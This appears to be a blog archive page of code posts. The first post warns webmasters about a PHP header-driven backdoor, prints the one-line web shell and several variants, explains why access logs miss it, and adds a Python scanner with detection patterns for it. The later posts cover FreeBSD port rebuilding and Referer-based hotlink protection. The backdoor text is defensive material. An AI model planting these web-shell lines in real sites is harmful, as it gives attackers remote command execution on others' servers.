Archive for the ‘Code’ Category.

Commonly found PHP backdoors, Vol. 1

Are you a webmaster who is concerned about hackers infesting your sites? Well, be on the lookout for crud like this:

<? passthru(getenv("HTTP_ACCEPT_jayman")); ?>

This one-liner runs whatever command the attacker sends in an “Accept-jayman:” HTTP request header: the web server exposes each request header as a CGI-style HTTP_ environment variable (the header name with hyphens turned into underscores), getenv() reads it, and passthru() hands the value to the shell and streams the command’s output back in the response. “jayman” is just an example (a prevalent one); the header name could be anything. It can be dropped into any of your PHP scripts without affecting your users’ experience, because no browser sends such a header, so the page behaves normally for everyone except the attacker. Headers are also not typically logged anywhere: Apache’s default common and combined log formats record only the request line, Referer and User-Agent, so a custom header never appears in the access log unless you add it to LogFormat with %{Header-Name}i, and you would need to know the name first. The attacker may therefore not be caught by inspecting logs.

I’ve seen this come up quite often, and it actually seems to be getting worse. Most of the time the attackers just want a place to run an IRC bot (iroffer), but often they want to redirect your surfers to their affiliate program links, send spam, or use your site to host their spam advertised content.

If you see something like this in your scripts, or sitting in a file of its own, it was put there by an attacker who got in through another exploitable script on your site. It’s very important to keep your site’s scripts up-to-date, and it’s a good idea to hire someone to audit your code or keep it up to date if you’re not a programmer yourself. (Be aware that whoever you hire may not actually be able to debug all of your scripts if any of them are Zend Encoder output, since those ship as encoded files rather than readable source.)

It’s also important to make sure your permissions are not overly open. PHP scripts typically run as the web server’s user. If your directory permissions are open (777, for example) and you have an exploitable script, someone could easily create their own files in the directory, and even replace your files with their own copies. Bear in mind that restrictive permission bits only help when your files are owned by a different user than the one PHP runs as; if the web server user owns them, a compromised script can rewrite them regardless of the mode.

Ultimately, the best advice I can give is to check your site’s contents often, keep your software up to date, keep your permissions sane, and hire someone knowledgeable and trustworthy to check out your site if you find you need help.
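As an added example (not code from the original post), here is a small Python scanner for this backdoor family, the kind of check "check your site's contents often" calls for. It goes a little beyond the snippet above: besides passthru() it flags system(), exec(), shell_exec(), popen() and proc_open() whenever they are fed from getenv("HTTP_*") or $_SERVER['HTTP_*'], optionally through one wrapper call such as base64_decode(). The file names and contents in SAMPLES are constructed for the demonstration; scan_tree() takes a real document root.

```python
import re
import sys
from pathlib import Path

# Shell-execution functions an attacker would feed from a request header.
EXEC_FUNCS = r"(?:passthru|system|exec|shell_exec|popen|proc_open)"
# A request header surfaced as a CGI-style HTTP_* variable, via getenv() or $_SERVER.
HEADER_SRC = (r"(?:getenv\s*\(\s*['\"]HTTP_\w+['\"]\s*\)"
              r"|\$_SERVER\s*\[\s*['\"]HTTP_\w+['\"]\s*\])")
# Optional single decoder/wrapper call between the two, e.g. base64_decode(...).
WRAPPER = r"(?:\w+\s*\(\s*)?"
BACKDOOR_RE = re.compile(EXEC_FUNCS + r"\s*\(\s*" + WRAPPER + HEADER_SRC, re.IGNORECASE)


def scan_source(src, name="<string>"):
    """Return (name, line number, matched text) for every header-fed exec call in src."""
    hits = []
    for lineno, line in enumerate(src.splitlines(), 1):
        for m in BACKDOOR_RE.finditer(line):
            hits.append((name, lineno, m.group(0)))
    return hits


def scan_tree(root, suffixes=(".php", ".inc", ".phtml")):
    """Walk a document root and scan every PHP-looking file."""
    hits = []
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in suffixes:
            hits.extend(scan_source(path.read_text(errors="replace"), str(path)))
    return hits


# Constructed samples (not real site files): the snippet from the post,
# two variants of it, and two benign files that must not be flagged.
SAMPLES = {
    "footer.php": '<? passthru(getenv("HTTP_ACCEPT_jayman")); ?>',
    "img.php": "<?php\nheader('Content-Type: image/gif');\nsystem($_SERVER['HTTP_X_CMD']);\n",
    "cache.inc": "<?php passthru(base64_decode(getenv(\"HTTP_X_PAYLOAD\")));",
    "config.php": "<?php\n$host = getenv('HTTP_HOST');\n$out = shell_exec('uptime');\n",
    "index.php": "<?php echo 'hello'; ?>",
}


def scan_samples():
    """Scan the constructed samples; returns {file name: hits}."""
    return {name: scan_source(src, name) for name, src in SAMPLES.items()}


if __name__ == "__main__":
    if len(sys.argv) > 1:
        results = scan_tree(sys.argv[1])
    else:
        results = [h for hits in scan_samples().values() for h in hits]
    for name, lineno, text in results:
        print("%s:%d: %s" % (name, lineno, text))
```

Run it with a document root as the only argument to scan real files; with no argument it scans the built-in samples. Note that config.php uses both getenv('HTTP_HOST') and shell_exec(), yet is not flagged, because the scanner only fires when a header value flows directly into an exec call; a scanner that matched either half on its own would bury you in false positives.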

Stability rant from unixblog

When is stability going to finally trump features?

In just about anything related to computers, there’s a tug of war between adding new features or fixing bugs. … in the general computing world, people don’t get sued for bugs, and adding new features is much more fun and sexy than fixing bugs.

I’m in total agreement with this guy. Just going for the free trackback here, heh.

FreeBSD ports fix

If you ever find yourself in my situation, where installing one updated port from a relatively freshly done cvsup ends up breaking a couple dozen other programs because it decided to upgrade several shared libraries, you might find the following for loop useful. It walks every binary in /usr/X11R6/bin, keeps those for which ldd reports a library as "not found", looks up the package that installed each one in /var/db/pkg/*/+CONTENTS, reads the port origin from that file's ORIGIN comment, and rebuilds each affected port:

cd /usr/X11R6/bin && for m in $(for l in $(for j in $(
    for i in *; do ldd $i 2>/dev/null | grep -q "not found" && echo $i; done  # binaries with a missing library
  ); do egrep "bin/$j" /var/db/pkg/*/+CONTENTS; done | sort -u | cut -f1 -d:   # +CONTENTS of the owning packages
  ); do grep " ORIGIN" $l; done | cut -f2 -d: | sort -u                        # "@comment ORIGIN:category/port"
  ); do cd /usr/ports/$m && make && make deinstall && make reinstall; done

Obviously, the above is evil in itself, so it should be considered a “quick fix” and nothing more. It only looks in /usr/X11R6/bin (point it at your other bin directories as needed), and the bin/$j match is a substring match, so it can occasionally pull in a package whose binary merely contains the same name. Enjoy!

mod_hotlink 1.0 released

mod_hotlink is some software I wrote ages ago to deal with the problem of how to politely* prevent one site from linking to images on another, without burning lots of CPU on every request (as mod_rewrite solutions do).

From the README:

Protects non-text content against “hotlinking” – a method for stealing
bandwidth by linking images and content from other websites to present
them as if they were their own.

For Apache 1.3, fully tested with 1.3.26, also works with later
versions. Not tested and not expected to work with 2.x without some
effort. Finally got around to creating a project for it, so hopefully
if it is found to be of use, a group effort will make something more
of it.

Please note: The Referer header sent by browsers is completely
optional, and often untrustworthy. There is very little anyone can
do about that. So, this won’t protect you from all hotlinking. In
practice, it works for most browsers.

* Politely as in people can still do it if they disable sending of referrer information, of course.
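As an added example, and not mod_hotlink's own code (which is an Apache 1.3 module), here is the Referer policy from the README modelled in Python. It shows the two points that matter in practice: a request without a usable Referer is let through, which is what makes the scheme "polite" and also why a browser with referrer sending disabled bypasses it, and the own-site test must match whole hostnames, since a plain suffix test would accept example.org.evil.net as example.org. The hostnames and requests in the block are constructed for the demonstration, and the suffix list standing in for "non-text content" is an assumption.

```python
from urllib.parse import urlsplit

# The README protects "non-text content"; modelled here as a suffix list (an assumption).
PROTECTED_SUFFIXES = (".gif", ".jpg", ".jpeg", ".png", ".zip")


def is_protected(path):
    """True for the request paths the policy applies to."""
    return path.lower().endswith(PROTECTED_SUFFIXES)


def referer_host(referer):
    """Hostname from a Referer value, or None when the header is absent, empty or unparsable."""
    if not referer:
        return None
    try:
        host = urlsplit(referer.strip()).hostname
    except ValueError:  # e.g. a malformed IPv6 literal
        return None
    return host.lower() if host else None


def host_is_ours(host, own_hosts, allow_subdomains=True):
    """Exact match on a configured hostname, or a dot-separated subdomain of one.

    Using "." + own (not a bare suffix) is what keeps example.org.evil.net out.
    """
    for own in own_hosts:
        own = own.lower()
        if host == own or (allow_subdomains and host.endswith("." + own)):
            return True
    return False


def decide(path, referer, own_hosts):
    """Return ("allow" | "deny", reason) for one request."""
    if not is_protected(path):
        return ("allow", "text content is never checked")
    host = referer_host(referer)
    if host is None:
        # Referer is optional: a direct load and a hotlink look identical here.
        return ("allow", "no usable Referer")
    if host_is_ours(host, own_hosts):
        return ("allow", "referer is our own site")
    return ("deny", "referer host %s is foreign" % host)


# Constructed requests (path, Referer) against a site that owns example.org.
OWN_HOSTS = ["example.org"]
REQUESTS = [
    ("/pics/cat.jpg", "http://www.example.org/gallery.html"),   # our own page
    ("/pics/cat.jpg", "http://forum.example.net/thread/42"),     # someone else's page
    ("/pics/cat.jpg", None),                                     # no Referer at all
    ("/pics/cat.jpg", "http://example.org.evil.net/"),           # suffix trick
    ("/gallery.html", "http://forum.example.net/thread/42"),     # text content
    ("/pics/cat.jpg", "not a url"),                              # junk Referer
]


def run_samples():
    """Verdict for each constructed request, in order."""
    return [decide(path, ref, OWN_HOSTS)[0] for path, ref in REQUESTS]


if __name__ == "__main__":
    for (path, ref), verdict in zip(REQUESTS, run_samples()):
        print("%-5s %-15s Referer=%r" % (verdict, path, ref))
```

The third and sixth requests are the ones the README's warning is about: because the header is optional and untrusted, an unparsable or missing Referer has to be treated as "unknown" and served, otherwise every visitor who types the URL or uses a privacy-conscious browser gets a broken image. Anyone who wants your bandwidth badly enough simply sends no Referer, or forges yours.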